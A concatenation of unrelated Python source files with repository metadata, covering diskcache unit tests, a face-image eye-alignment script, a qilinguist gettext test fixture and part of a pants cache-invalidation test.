cache[1], cache[1], cache[1], cache[1]
cache[7], cache[7], cache[7]
cache[8], cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_filename_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
with mock.patch('os.makedirs', func):
with pytest.raises(OSError):
cache._disk.filename()
def test_remove_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
try:
with mock.patch('os.remove', func):
cache._disk.remove('ab/cd/efg.val')
except OSError:
pass
else:
if os.name == 'nt':
pass # File delete errors ignored on Windows.
else:
raise Exception('test_remove_error failed')
def test_check(cache):
blob = b'a' * 2 ** 20
keys = (0, 1, 1234, 56.78, u'hello', b'world', None)
for key in keys:
cache[key] = blob
# Cause mayhem.
with cache.get(0, read=True) as reader:
full_path = reader.name
os.rename(full_path, full_path + '_moved')
with cache.get(1, read=True) as reader:
full_path = reader.name
os.remove(full_path)
cache._sql('UPDATE Cache SET size = 0 WHERE rowid > 1')
cache.reset('count', 0)
cache.reset('size', 0)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0 # Should display no warnings.
def test_integrity_check(cache):
for value in range(1000):
cache[value] = value
cache.close()
with io.open(op.join(cache.directory, 'cache.db'), 'r+b') as writer:
writer.seek(52)
writer.write(b'\x00\x01') # Should be 0, change it.
cache = dc.Cache(cache.directory)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0
def test_expire(cache):
cache.reset('cull_limit', 0) # Disable expiring keys on `set`.
now = time.time()
time_time = mock.Mock(return_value=now)
with mock.patch('time.time', time_time):
for value in range(1, 101):
assert cache.set(value, value, expire=value)
assert len(cache) == 100
time_time = mock.Mock(return_value=now + 11)
cache.reset('cull_limit', 10)
with mock.patch('time.time', time_time):
assert cache.expire() == 10
assert len(cache) == 90
assert len(cache.check()) == 0
def test_tag_index():
with dc.Cache(tag_index=True) as cache:
assert cache.tag_index == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_evict(cache):
colors = ('red', 'blue', 'yellow')
for value in range(90):
assert cache.set(value, value, tag=colors[value % len(colors)])
assert len(cache) == 90
assert cache.evict('red') == 30
assert len(cache) == 60
assert len(cache.check()) == 0
def test_clear(cache):
for value in range(100):
cache[value] = value
assert len(cache) == 100
assert cache.clear() == 100
assert len(cache) == 0
assert len(cache.check()) == 0
def test_clear_timeout(cache):
transact = mock.Mock()
transact.side_effect = dc.Timeout
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.clear()
def test_tag(cache):
assert cache.set(0, None, tag=u'zero')
assert cache.set(1, None, tag=1234)
assert cache.set(2, None, tag=5.67)
assert cache.set(3, None, tag=b'three')
assert cache.get(0, tag=True) == (None, u'zero')
assert cache.get(1, tag=True) == (None, 1234)
assert cache.get(2, tag=True) == (None, 5.67)
assert cache.get(3, tag=True) == (None, b'three')
def test_with(cache):
with dc.Cache(cache.directory) as tmp:
tmp[u'a'] = 0
tmp[u'b'] = 1
assert cache[u'a'] == 0
assert cache[u'b'] == 1
def test_contains(cache):
assert 0 not in cache
cache[0] = 0
assert 0 in cache
def test_touch(cache):
assert cache.set(0, None, expire=60)
assert cache.touch(0, expire=None)
assert cache.touch(0, expire=0)
assert not cache.touch(0)
def test_add(cache):
assert cache.add(1, 1)
assert cache.get(1) == 1
assert not cache.add(1, 2)
assert cache.get(1) == 1
assert cache.delete(1)
assert cache.add(1, 1, expire=0.001)
time.sleep(0.01)
assert cache.add(1, 1)
cache.check()
def test_add_large_value(cache):
value = b'abcd' * 2 ** 20
assert cache.add(b'test-key', value)
assert cache.get(b'test-key') == value
assert not cache.add(b'test-key', value * 2)
assert cache.get(b'test-key') == value
cache.check()
def test_add_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.add(0, 0)
finally:
cache.check()
def test_incr(cache):
assert cache.incr('key', default=5) == 6
assert cache.incr('key', 2) == 8
assert cache.get('key', expire_time=True, tag=True) == (8, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.incr('key') == 1
def test_incr_insert_keyerror(cache):
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_incr_update_keyerror(cache):
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_decr(cache):
assert cache.decr('key', default=5) == 4
assert cache.decr('key', 2) == 2
assert cache.get('key', expire_time=True, tag=True) == (2, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.decr('key') == -1
def test_iter(cache):
sequence = list('abcdef') + [('g',)]
for index, value in enumerate(sequence):
cache[value] = index
iterator = iter(cache)
assert all(one == two for one, two in zip(sequence, iterator))
cache['h'] = 7
with pytest.raises(StopIteration):
next(iterator)
def test_iter_expire(cache):
cache.reset('cull_limit', 0)
for num in range(100):
cache.set(num, num, expire=1e-9)
assert len(cache) == 100
assert list(cache) == list(range(100))
def test_iter_error(cache):
with pytest.raises(StopIteration):
next(iter(cache))
def test_reversed(cache):
sequence = 'abcdef'
for index, value in enumerate(sequence):
cache[value] = index
iterator = reversed(cache)
pairs = zip(reversed(sequence), iterator)
assert all(one == two for one, two in pairs)
try:
next(iterator)
except StopIteration:
pass
else:
assert False, 'StopIteration expected'
def test_reversed_error(cache):
with pytest.raises(StopIteration):
next(reversed(cache))
def test_push_pull(cache):
for value in range(10):
cache.push(value)
for value in range(10):
_, pull_value = cache.pull()
assert pull_value == value
assert len(cache) == 0
def test_push_pull_prefix(cache):
for value in range(10):
cache.push(value, prefix='key')
for value in range(10):
key, peek_value = cache.peek(prefix='key')
key, pull_value = cache.pull(prefix='key')
assert key.startswith('key')
assert peek_value == value
assert pull_value == value
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_pull_extras(cache):
cache.push('test')
assert cache.pull() == (500000000000000, 'test')
assert len(cache) == 0
cache.push('test', expire=10)
(key, value), expire_time = cache.peek(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 1
(key, value), expire_time = cache.pull(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 0
cache.push('test', tag='foo')
(key, value), tag = cache.peek(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 1
(key, value), tag = cache.pull(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 0
cache.push('test')
(key, value), expire_time, tag = cache.peek(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 1
(key, value), expire_time, tag = cache.pull(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 0
assert cache.pull(default=(0, 1)) == (0, 1)
assert len(cache.check()) == 0
def test_push_pull_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.pull() == (500000000000003, 1)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.peek() == (500000000000003, 1)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_push_pull_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.pull() == (500000000000000, value)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.peek() == (500000000000000, value)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_pull_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pull() == (None, None)
def test_peek_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 0]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peek()
assert value == 0
def test_pull_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pull()
def test_peek_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peek()
def test_peekitem_extras(cache):
with pytest.raises(KeyError):
cache.peekitem()
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2, expire=10, tag='foo')
assert cache.set('d', 3, expire=0.1)
assert cache.set('e', 4, expire=0.1)
time.sleep(0.2)
(key, value), expire_time, tag = cache.peekitem(expire_time=True, tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
(key, value), expire_time = cache.peekitem(expire_time=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
(key, value), tag = cache.peekitem(tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
def test_peekitem_ioerror(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 2]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peekitem()
assert value == 2
def test_peekitem_ioerror_eacces(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peekitem()
def test_iterkeys(cache):
assert list(cache.iterkeys()) == []
def test_pickle(cache):
for num, val in enumerate('abcde'):
cache[val] = num
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in other:
assert other[key] == cache[key]
def test_pragmas(cache):
results = []
def compare_pragmas():
valid = True
for key, value in dc.DEFAULT_SETTINGS.items():
if not key.startswith('sqlite_'):
continue
pragma = key[7:]
result = cache._sql('PRAGMA %s' % pragma).fetchall()
if result == [(value,)]:
continue
args = pragma, result, [(value,)]
print('pragma %s mismatch: %r != %r' % args)
valid = False
results.append(valid)
threads = []
for count in range(8):
thread = threading.Thread(target=compare_pragmas)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
assert all(results)
def test_size_limit_with_files(cache):
cache.reset('cull_limit', 0)
size_limit = 30 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'foo' * cache.disk_min_file_size
for key in range(40):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_size_limit_with_database(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_eviction_policy_none(cache):
cache.reset('eviction_policy', 'none')
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() > size_limit
def test_cull_size_limit_0(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', 0)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_timeout(cache):
transact = mock.Mock()
transact.side_effect = [dc.Timeout]
with mock.patch.object(cache, 'expire', lambda now: 0):
with mock.patch.object(cache, 'volume', lambda: int(1e12)):
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.cull()
def test_key_roundtrip(cache):
key_part_0 = u"part0"
key_part_1 = u"part1"
to_test = [
(key_part_0, key_part_1),
[key_part_0, key_part_1],
]
for key in to_test:
cache.clear()
cache[key] = {'example0': ['value0']}
keys = list(cache)
assert len(keys) == 1
cache_key = keys[0]
assert cache[key] == {'example0': ['value0']}
assert cache[cache_key] == {'example0': ['value0']}
def test_constant():
import diskcache.core
assert repr(diskcache.core.ENOVAL) == 'ENOVAL'
def test_copy():
cache_dir1 = tempfile.mkdtemp()
with dc.Cache(cache_dir1) as cache1:
for count in range(10):
cache1[count] = str(count)
for count in range(10, 20):
cache1[count] = str(count) * int(1e5)
cache_dir2 = tempfile.mkdtemp()
shutil.rmtree(cache_dir2)
shutil.copytree(cache_dir1, cache_dir2)
with dc.Cache(cache_dir2) as cache2:
for count in range(10):
assert cache2[count] == str(count)
for count in range(10, 20):
assert cache2[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def run(command):
print('run$ %r' % command)
try:
result = sp.check_output(command, stderr=sp.STDOUT)
print(result)
except sp.CalledProcessError as exc:
print(exc.output)
raise
def test_rsync():
try:
run(['rsync', '--version'])
except OSError:
return # No rsync installed. Skip test.
rsync_args = ['rsync', '-a', '--checksum', '--delete', '--stats']
cache_dir1 = tempfile.mkdtemp() + os.sep
cache_dir2 = tempfile.mkdtemp() + os.sep
# Store some items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
cache1[count] = str(count)
for count in range(100, 200):
cache1[count] = str(count) * int(1e5)
# Rsync cache_dir1 to cache_dir2.
run(rsync_args + [cache_dir1, cache_dir2])
# Validate items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(100):
assert cache2[count] == str(count)
for count in range(100, 200):
assert cache2[count] == str(count) * int(1e5)
# Store more items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(200, 300):
cache2[count] = str(count)
for count in range(300, 400):
cache2[count] = str(count) * int(1e5)
# Rsync cache_dir2 to cache_dir1.
run(rsync_args + [cache_dir2, cache_dir1])
# Validate items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
assert cache1[count] == str(count)
for count in range(100, 200):
assert cache1[count] == str(count) * int(1e5)
for count in range(200, 300):
assert cache1[count] == str(count)
for count in range(300, 400):
assert cache1[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def test_custom_eviction_policy(cache):
dc.EVICTION_POLICY['lru-gt-1s'] = {
'init': (
'CREATE INDEX IF NOT EXISTS Cache_access_time ON'
' Cache (access_time)'
),
'get': 'access_time = {now}',
'cull': (
'SELECT {fields} FROM Cache'
' WHERE access_time < ({now} - 1)'
' ORDER BY access_time LIMIT ?'
),
}
size_limit = int(1e5)
cache.reset('eviction_policy', 'lru-gt-1s')
cache.reset('size_limit', size_limit)
for count in range(100, 150):
cache[count] = str(count) * 500
size = cache.volume()
assert size > size_limit
assert cache.cull() == 0
assert size == cache.volume()
for count in range(100, 150):
assert cache[count] == str(count) * 500
time.sleep(1.1)
assert cache.cull() > 0
assert cache.volume() < size_limit
def test_lru_incr(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.incr(0)
cache.decr(0)
assert cache[0] == 0
def test_memoize(cache):
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize()
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
assert fibrec(value) == fibiter(value)
hits1, misses1 = cache.stats()
for value in range(count):
assert fibrec(value) == fibiter(value)
hits2, misses2 = cache.stats()
assert hits2 == (hits1 + count)
assert misses2 == misses1
if __name__ == '__main__':
import nose
nose.runmodule()
| 24.460823 | 79 | 0.610538 |
acf6b4f2fbe9aeb525accbdbb1cd4309d5967ef9 | 44 | py | Python | Chapter16/cf_rfem_hist_price/venv/lib/python3.6/weakref.py | wtwong316/Mastering-Elasticsearch-7.0 | 8e88f938c9feb201649bd23c4d517bc6af93fbaa | [
"MIT"
] | 25 | 2019-03-08T01:03:03.000Z | 2022-02-14T17:38:32.000Z | Chapter16/cf_rfem_hist_price/venv/lib/python3.6/weakref.py | wtwong316/Mastering-Elasticsearch-7.0 | 8e88f938c9feb201649bd23c4d517bc6af93fbaa | [
"MIT"
] | 2 | 2019-02-15T17:34:37.000Z | 2019-07-11T14:37:02.000Z | Chapter16/cf_rfem_hist_price/venv/lib/python3.6/weakref.py | wtwong316/Mastering-Elasticsearch-7.0 | 8e88f938c9feb201649bd23c4d517bc6af93fbaa | [
"MIT"
] | 31 | 2019-01-15T20:16:50.000Z | 2022-03-01T05:47:38.000Z | /home/wai/anaconda3/lib/python3.6/weakref.py | 44 | 44 | 0.818182 |
acf6b51cc4c5d56b25fc663d2f20ed3f6eb229ba | 316 | py | Python | warg/mixins/__init__.py | cnheider/warg | 4bcc5d3e86dd843773ca6cbca21bcab3b8ae84eb | [
"Apache-2.0"
] | 1 | 2018-11-30T09:14:28.000Z | 2018-11-30T09:14:28.000Z | warg/mixins/__init__.py | aivclab/warg | 4bcc5d3e86dd843773ca6cbca21bcab3b8ae84eb | [
"Apache-2.0"
] | 49 | 2019-04-02T12:06:10.000Z | 2019-08-31T14:30:12.000Z | warg/mixins/__init__.py | cnHeider/warg | 4bcc5d3e86dd843773ca6cbca21bcab3b8ae84eb | [
"Apache-2.0"
] | 1 | 2020-10-01T00:18:12.000Z | 2020-10-01T00:18:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__doc__ = r"""
Created on 17/02/2020
"""
__author__ = "Christian Heider Nielsen"
from pathlib import Path
with open(Path(__file__).parent / "README.md", "r") as this_init_file:
__doc__ += this_init_file.read()
from .dict_mixins import *
| 18.588235 | 70 | 0.636076 |
acf6b61236a474ae9c7ef3404a9bcafcd6b89423 | 4,142 | py | Python | image_processor.py | jake-stewart/pca-ann-facial-recognition | 84fe5599904c653d46e222ed271618e6420acead | [
"MIT"
] | null | null | null | image_processor.py | jake-stewart/pca-ann-facial-recognition | 84fe5599904c653d46e222ed271618e6420acead | [
"MIT"
] | null | null | null | image_processor.py | jake-stewart/pca-ann-facial-recognition | 84fe5599904c653d46e222ed271618e6420acead | [
"MIT"
] | null | null | null | from math import sqrt, sin, cos, atan2, floor
from matplotlib import pyplot as plt
import matplotlib.image as mpimg
from PIL import Image
import json
def dist(a, b):
return sqrt(
(b[0] - a[0])**2 +
(b[1] - a[1])**2
)
def fix_rotation(image, left_eye, right_eye):
rot = -atan2(
right_eye[1] - left_eye[1],
right_eye[0] - left_eye[0]
)
x, y = left_eye
c = cos(rot)/1
s = sin(rot)/1
return image.transform(
image.size,
Image.AFFINE,
(
c, s, x - x*c - y*s,
-s, c, y - x*-s - y*c
),
resample=Image.BICUBIC
)
def fix_alignment(image, left_eye, right_eye):
scale = dist(left_eye, right_eye) / 26
x = left_eye[0] - scale * 19
y = left_eye[1] - scale * 19
size = 64 * scale
return image.crop((
int(x),
int(y),
int(x + size),
int(y + size)
))
def fix_size(image):
return image.resize((64, 64), Image.ANTIALIAS)
def format_face(path, left_eye, right_eye, dest_path=None):
# use source path as destination path if no dest provided
if not dest_path:
dest_path = path
image = Image.open(path)
image = fix_rotation(image, left_eye, right_eye)
image = fix_alignment(image, left_eye, right_eye)
image = fix_size(image)
image.save(dest_path)
class EyeLocator:
def __init__(self, image_data, source_dir, dest_dir, plt, index=0):
self.images = []
for subject in image_data:
for image_name in subject:
self.images.append(image_name)
self.master = plt
self.fig = self.master.figure()
self.dest_dir = dest_dir
self.source_dir = source_dir
self.index = index
self.enable_events()
self.next_face()
def enable_events(self):
self.fig.canvas.mpl_connect(
"button_press_event", self.on_click
)
def on_click(self, event):
# no data recorded for image
if self.status == 0:
self.left_eye = (int(event.xdata), int(event.ydata))
self.status = 1
# left eye data recorded for image
elif self.status == 1:
self.right_eye = (int(event.xdata), int(event.ydata))
self.status = 0
self.finished_gathering()
def finished_gathering(self):
# process, increment index, display new face
self.process_data()
self.index += 1
if self.index == len(self.images):
self.master.close()
self.next_face()
def process_data(self):
try:
dest_path = self.dest_dir + "\\" + self.images[self.index]
source_path = self.source_dir + "\\" + self.images[self.index]
format_face(
source_path,
self.left_eye,
self.right_eye,
dest_path
)
except FileNotFoundError:
self.master.close()
print("You must create the directory `{}`".format(
self.dest_dir
))
input() # stop program from instantly closing
exit()
def reset(self):
self.left_eye = None
self.right_eye = None
self.status = 0
def next_face(self):
# reset measurement variables
self.reset()
# load next face
file_name = self.source_dir + "\\" + self.images[self.index]
img = mpimg.imread(file_name)
# draw face
self.master.clf()
self.master.imshow(img, cmap="gray")
self.fig.canvas.draw()
def start(self):
# start matplotlib loop
self.master.show()
if __name__ == "__main__":
# load image data from file
with open("image_data.json") as f:
image_data = json.load(f)
unprocessed_dir = "unprocessed_images"
processed_dir = "processed_images"
EyeLocator(image_data, unprocessed_dir, processed_dir, plt).start()
| 27.613333 | 75 | 0.548286 |
acf6b7cc2c40f2d25f7d4224cd5525bca2a2983b | 4,411 | py | Python | python/qilinguist/test/conftest.py | PrashantKumar-sudo/qibuild | a16ce425cf25127ceff29507feeeeca37af23351 | [
"BSD-3-Clause"
] | null | null | null | python/qilinguist/test/conftest.py | PrashantKumar-sudo/qibuild | a16ce425cf25127ceff29507feeeeca37af23351 | [
"BSD-3-Clause"
] | null | null | null | python/qilinguist/test/conftest.py | PrashantKumar-sudo/qibuild | a16ce425cf25127ceff29507feeeeca37af23351 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" ConfTest """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import py
import qilinguist.worktree
from qisys.test.conftest import * # pylint:disable=W0401,W0614
from qibuild.test.conftest import * # pylint:disable=W0401,W0614
class QiLinguistAction(TestAction):
""" QiLinguistAction Class """
def __init__(self, worktree_root=None):
""" QiLinguistAction Init """
super(QiLinguistAction, self).__init__("qilinguist.actions")
self.build_worktree = TestBuildWorkTree()
self.trad = self.build_worktree.add_test_project("translateme/gettext")
def create_po(self, proj):
""" Create Po """
fr_FR_po_file = os.path.join(proj.path, "po", "fr_FR.po")
en_US_po_file = os.path.join(proj.path, "po", "en_US.po")
fr_file = open(fr_FR_po_file, 'wb')
en_file = open(en_US_po_file, 'wb')
fr_file.write(b"""
# French translations for qi package
# Traductions fran\xc3\xa7aises du paquet qi.
# Copyright (C) 2012 THE qi'S COPYRIGHT HOLDER
# This file is distributed under the same license as the qi package.
# Automatically generated, 2012.
#
msgid ""
msgstr ""
"Project-Id-Version: qi 1.16\\n"
"Report-Msgid-Bugs-To: \\n"
"POT-Creation-Date: 2012-10-09 15:15+0200\\n"
"PO-Revision-Date: 2012-10-09 15:15+0200\\n"
"Last-Translator: Automatically generated\\n"
"Language-Team: none\\n"
"Language: fr\\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
"Plural-Forms: nplurals=2; plural=(n > 1);\\n"
"X-Language: fr_FR\\n"
#: main.cpp:15
msgid "Brian is in the kitchen."
msgstr "Brian est dans la cuisine."
#: main.cpp:13
msgid "Hi, my name is NAO."
msgstr "Bonjour, mon nom est NAO."
#: main.cpp:14
msgid "Where is Brian?"
msgstr "O\xc3\xb9 est Brian ?"
""")
en_file.write(b"""
# English translations for qi package.
# Copyright (C) 2012 THE qi'S COPYRIGHT HOLDER
# This file is distributed under the same license as the qi package.
# Automatically generated, 2012.
#
msgid ""
msgstr ""
"Project-Id-Version: qi 1.16\\n"
"Report-Msgid-Bugs-To: \\n"
"POT-Creation-Date: 2012-10-09 15:15+0200\\n"
"PO-Revision-Date: 2012-10-09 15:15+0200\\n"
"Last-Translator: Automatically generated\\n"
"Language-Team: none\\n"
"Language: en_US\\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\\n"
"X-Language: en_US\\n"
#: main.cpp:15
msgid "Brian is in the kitchen."
msgstr "Brian is in the kitchen."
#: main.cpp:13
msgid "Hi, my name is NAO."
msgstr "Hi, my name is NAO."
#: main.cpp:14
msgid "Where is Brian?"
msgstr "Where is Brian?"
""")
fr_file.close()
en_file.close()
class TestLinguistWorktree(qilinguist.worktree.LinguistWorkTree):
""" TestLinguistWorktree Class """
def __init__(self, worktree=None):
""" TestLinguistWorktree Init """
if not worktree:
worktree = TestWorkTree()
super(TestLinguistWorktree, self).__init__(worktree)
self.tmpdir = py.path.local(self.root) # pylint:disable=no-member
def create_gettext_project(self, name):
""" Create GetText Project """
proj_path = os.path.join(self.root, name)
qisys.sh.mkdir(proj_path, recursive=True)
qiproject_xml = os.path.join(proj_path, "qiproject.xml")
with open(qiproject_xml, "w") as fp:
fp.write("""
<project version="3">
<qilinguist name="{name}" tr="gettext" linguas="fr_FR en_US" />
</project>
""".format(name=name))
self.worktree.add_project(name)
return self.get_linguist_project(name, raises=True)
@pytest.fixture
def qilinguist_action(cd_to_tmpdir):
""" QiLinguits Action """
return QiLinguistAction()
@pytest.fixture
def linguist_worktree(cd_to_tmpdir):
""" Linguits Worktree """
return TestLinguistWorktree()
| 31.507143 | 84 | 0.649286 |
acf6b9a625dc2de31956f51e3a2410c33c940023 | 4,692 | py | Python | tests/python/pants_test/tasks/test_cache_manager.py | areitz/pants | 9bfb3feb0272c05f36e190c9147091b97ee1950d | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/tasks/test_cache_manager.py | areitz/pants | 9bfb3feb0272c05f36e190c9147091b97ee1950d | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/tasks/test_cache_manager.py | areitz/pants | 9bfb3feb0272c05f36e190c9147091b97ee1950d | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import shutil
import tempfile
from pants.base.build_invalidator import CacheKey, CacheKeyGenerator
from pants.base.cache_manager import InvalidationCacheManager, InvalidationCheck, VersionedTarget
from pants_test.base_test import BaseTest
class AppendingCacheKeyGenerator(CacheKeyGenerator):
"""Generates cache keys for versions of target sets."""
@staticmethod
def combine_cache_keys(cache_keys):
if len(cache_keys) == 1:
return cache_keys[0]
else:
sorted_cache_keys = sorted(cache_keys) # For commutativity.
combined_id = ','.join([cache_key.id for cache_key in sorted_cache_keys])
combined_hash = ','.join([cache_key.hash for cache_key in sorted_cache_keys])
combined_num_sources = reduce(lambda x, y: x + y,
[cache_key.num_sources for cache_key in sorted_cache_keys], 0)
return CacheKey(combined_id, combined_hash, combined_num_sources)
def key_for_target(self, target, sources=None, transitive=False, fingerprint_strategy=None):
return CacheKey(target.id, target.id, target.num_chunking_units)
def key_for(self, tid, sources):
return CacheKey(tid, tid, len(sources))
def print_vt(vt):
print('%d (%s) %s: [ %s ]' % (len(vt.targets), vt.cache_key, vt.valid, ', '.join(['%s(%s)' % (v.id, v.cache_key) for v in vt.versioned_targets])))
class InvalidationCacheManagerTest(BaseTest):
class TestInvalidationCacheManager(InvalidationCacheManager):
def __init__(self, tmpdir):
InvalidationCacheManager.__init__(self, AppendingCacheKeyGenerator(), tmpdir, True)
def setUp(self):
super(InvalidationCacheManagerTest, self).setUp()
self._dir = tempfile.mkdtemp()
self.cache_manager = InvalidationCacheManagerTest.TestInvalidationCacheManager(self._dir)
def tearDown(self):
shutil.rmtree(self._dir, ignore_errors=True)
super(InvalidationCacheManagerTest, self).tearDown()
def make_vts(self, target):
return VersionedTarget(self.cache_manager, target, target.id)
def test_partition(self):
# The default EmptyPayload chunking unit happens to be 1, so each of these Targets
# has a chunking unit contribution of 1
a = self.make_target(':a', dependencies=[])
b = self.make_target(':b', dependencies=[a])
c = self.make_target(':c', dependencies=[b])
d = self.make_target(':d', dependencies=[c, a])
e = self.make_target(':e', dependencies=[d])
targets = [a, b, c, d, e]
def print_partitions(partitions):
strs = []
for partition in partitions:
strs.append('(%s)' % ', '.join([t.id for t in partition.targets]))
